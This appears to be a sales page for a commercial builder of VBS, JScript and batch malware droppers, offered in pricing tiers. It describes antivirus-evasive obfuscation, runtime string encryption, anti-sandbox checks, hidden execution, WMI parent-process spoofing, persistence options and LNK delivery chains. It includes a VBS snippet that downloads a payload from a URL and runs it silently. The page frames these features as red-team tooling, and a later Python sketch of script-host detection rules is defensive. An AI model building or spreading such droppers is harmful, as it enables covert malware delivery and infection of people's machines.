The Script Builder produces text artifacts in three classic formats — .vbs, .js (JScript), and .bat — each handled by a long-shipped, fully-trusted Windows host: Windows Script Host (wscript.exe/cscript.exe) for VBS and JS, and cmd.exe for batch.
Because the artifact is plain text, there is no PE structure for static AV to fingerprint. Detection must rely on lexical/behavioral analysis of the script itself — and the builder layers obfuscation, string encryption, and dynamic dispatch to make signature-based rules brittle.
WindowStyle = 0 (vbHide)
Supply a local PE or a hosted URL. Builder selects embedded or stager mode automatically based on size.
Choose .vbs, .js, or .bat — or build all three for fan-out delivery.
Pick obfuscation level, decoy behavior, anti-sandbox checks, and persistence options.
Output is a single-file script. Double-click, drop into archive, or chain after an LNK.
Uses WScript.Shell, MSXML2.XMLHTTP, and ADODB.Stream for download + write, then Run for execution. Optional WMI spawning for parent-process spoofing.
JScript via cscript.exe //E:JScript or wscript.exe. Same COM stack as VBS but different lexical signature — useful when VBS is blocked by policy.
Pure .bat with powershell/certutil/curl/bitsadmin sub-commands. Useful in environments where WSH is disabled but cmd is whitelisted.
Every build randomizes: variable names, comment lines, string-split points, control-flow order, and decoy operations. Two consecutive builds share no static signature.
Per-build XOR/AES key embedded as constants. URLs, command names, and decoy text are decrypted at runtime — no plain-text IOCs in the file.
Optional checks: cursor movement, recent documents count, mouse-position drift, hostname pattern, uptime threshold. Quiet exit on detection.
```vbs
' Decrypt URL constants
Dim u : u = Dec("d3ab...c2", k)
Dim p : p = CreateObject("MSXML2.XMLHTTP.6.0")
p.Open "GET", u, False : p.Send
Dim s : Set s = CreateObject("ADODB.Stream")
s.Type = 1 : s.Open : s.Write p.responseBody
s.SaveToFile tmp, 2
CreateObject("WScript.Shell").Run tmp, 0, False
```
| Specification | Details |
|---|---|
| Output Formats | .vbs (VBScript) · .js (JScript) · .bat (Cmd batch) |
| OS Compatibility | Windows XP / 7 / 8.1 / 10 / 11 (WSH ships by default) |
| Execution Hosts | wscript.exe · cscript.exe · cmd.exe |
| Delivery Mode | URL stager (HTTPS via XMLHTTP) · Local embed (Base64 + AES in script body) |
| Obfuscation | String encryption · Variable randomization · Control-flow shuffling · Comment injection |
| Window Behavior | Hidden (vbHide / SW_HIDE) |
| Anti-Analysis | Cursor activity · Recent docs · Hostname filter · Uptime gating |
| Decoy | Optional drop-and-open of benign document during execution |
| Persistence | Run-key, scheduled task, startup folder (configurable) |
VBS/JS attachments in authorized phishing simulations — measure gateway filtering and end-user click behavior.
Use as second stage from a LOLBin-targeted LNK: LNK › cmd › script fetched and executed.
Generate samples to validate WSH telemetry, AMSI integration, and behavioral rules around wscript.exe spawning network children.
Study how various sandboxes handle WSH artifacts and which anti-analysis primitives evade detonation.
Demonstrate why "double-clicking that script" is dangerous, with measurable simulated outcomes.
Reproduce TTPs from VBS-heavy campaigns (Kimsuky, MuddyWater, FIN11) for purple-team validation.
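The behavioral rules mentioned in the detection-validation use case (script hosts opening network connections or spawning children, plus the WMI parent-spoofing case) can be sketched as below. This is an added example, not code from this page or the product; the event dicts, field names, and rule names are constructed assumptions loosely modelled on Sysmon event types.

```python
# Added example. Events are constructed and only loosely modelled on Sysmon
# process-create (1), network-connect (3) and file-create (11) records;
# the dict field names are simplified assumptions, not a real log schema.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
FETCH_TOOLS = {"powershell.exe", "certutil.exe", "curl.exe", "bitsadmin.exe"}

def base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return sorted (rule, pid) findings for an ordered event stream."""
    findings, dropped = set(), set()
    for ev in events:
        image = base(ev["image"])
        if ev["id"] == 3 and image in SCRIPT_HOSTS:
            # XMLHTTP runs in-process, so the script host owns the socket.
            findings.add(("wsh_network_connection", ev["pid"]))
        elif ev["id"] == 11 and image in SCRIPT_HOSTS:
            # Remember files the host wrote (the ADODB.Stream SaveToFile step).
            dropped.add(ev["target"].lower())
        elif ev["id"] == 1:
            parent = base(ev["parent_image"])
            if parent in SCRIPT_HOSTS:
                findings.add(("wsh_spawned_child", ev["pid"]))
            if parent == "cmd.exe" and image in FETCH_TOOLS:
                findings.add(("cmd_spawned_fetch_tool", ev["pid"]))
            if ev["image"].lower() in dropped:
                # Parent-independent: still fires when WMI launches the file.
                findings.add(("wsh_dropped_file_executed", ev["pid"]))
    return sorted(findings)

SYS = "C:\\Windows\\System32\\"
TMP = "C:\\Users\\u\\AppData\\Local\\Temp\\a.exe"
SAMPLE_EVENTS = [  # constructed
    {"id": 1, "pid": 4100, "image": SYS + "wscript.exe", "parent_image": "C:\\Windows\\explorer.exe"},
    {"id": 3, "pid": 4100, "image": SYS + "wscript.exe", "dest": "203.0.113.10:443"},
    {"id": 11, "pid": 4100, "image": SYS + "wscript.exe", "target": TMP},
    {"id": 1, "pid": 4188, "image": TMP, "parent_image": SYS + "wbem\\WmiPrvSE.exe"},
    {"id": 1, "pid": 5200, "image": SYS + "cmd.exe", "parent_image": "C:\\Windows\\explorer.exe"},
    {"id": 1, "pid": 5244, "image": SYS + "certutil.exe", "parent_image": SYS + "cmd.exe"},
    {"id": 1, "pid": 6000, "image": SYS + "notepad.exe", "parent_image": SYS + "wscript.exe"},
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(rule, pid)
```

The file-write correlation is the rule that survives parent spoofing: a pure parent-child rule on wscript.exe does not fire when the dropped file is launched through WMI.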
All tiers include unlimited builds across VBS / JS / BAT, full obfuscation engine, and updates within the term.
Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.